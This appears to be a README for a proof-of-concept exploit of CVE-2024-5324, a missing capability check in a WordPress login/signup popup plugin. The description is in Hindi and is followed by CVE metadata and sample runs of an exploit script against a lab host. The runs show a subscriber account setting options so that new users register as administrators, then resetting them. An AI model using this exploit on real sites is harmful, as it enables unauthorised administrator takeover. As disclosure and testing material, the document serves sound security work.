
लॉगिन/साइनअप पॉपअप ( इनलाइन फॉर्म + वूकॉमर्स ) 2.7.1 - 2.7.2 - मनमाने विकल्प अपडेट के लिए अनधिकृत पहुंच की कमी
लॉगिन/साइनअप पॉपअप (इनलाइन फॉर्म + वूकॉमर्स) 2.7.1 - 2.7.2 - मनमाने विकल्पों को अद्यतन करने के लिए अनधिकृत प्राधिकरण
वर्डप्रेस के लिए लॉगिन/साइनअप पॉपअप (इनलाइन फॉर्म + वूकॉमर्स) प्लगइन, संस्करण 2.7.1 से 2.7.2 में, 'import_settings' फ़ंक्शन में क्षमता जाँच की कमी के कारण डेटा में अनधिकृत संशोधन के लिए असुरक्षित है। इससे प्रमाणित हमलावरों, जिनके पास सब्सक्राइबर-स्तर या उससे ऊपर की पहुँच है, के लिए प्रभावित साइटों पर मनमाने विकल्प बदलना संभव हो जाता है। इसका उपयोग नए उपयोगकर्ता पंजीकरण को सक्षम करने और नए उपयोगकर्ताओं के लिए डिफ़ॉल्ट भूमिका व्यवस्थापक सेट करने के लिए किया जा सकता है।
Severity: high
CVE ID: CVE-2024-5324
CVSS Score: 8.8
CVSS Metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Plugin Slug: easy-login-woocommerce
WPScan URL: https://www.wpscan.com/plugin/easy-login-woocommerce
Reference URL: https://www.wordfence.com/threat-intel/vulnerabilities/id/005a27c6-b9eb-466c-b0c3-ce52c25bb321?source=api-prod
$ python3 CVE-2024-5324.py --url http://wordpress.lan -un test -p test
The plugin version is 2.7.1.
Vulnerability check: http://wordpress.lan
Logged in successfully.
Option set successfully: http://wordpress.lan/wp-admin/admin-ajax.php
You can now register a user on the as a admin.
$ python3 CVE-2024-5324.py --url http://wordpress.lan -un test -p test --fix e
The plugin version is 2.7.1.
Vulnerability check: http://wordpress.lan
Logged in successfully.
Option set successfully: http://wordpress.lan/wp-admin/admin-ajax.php
Options reset to default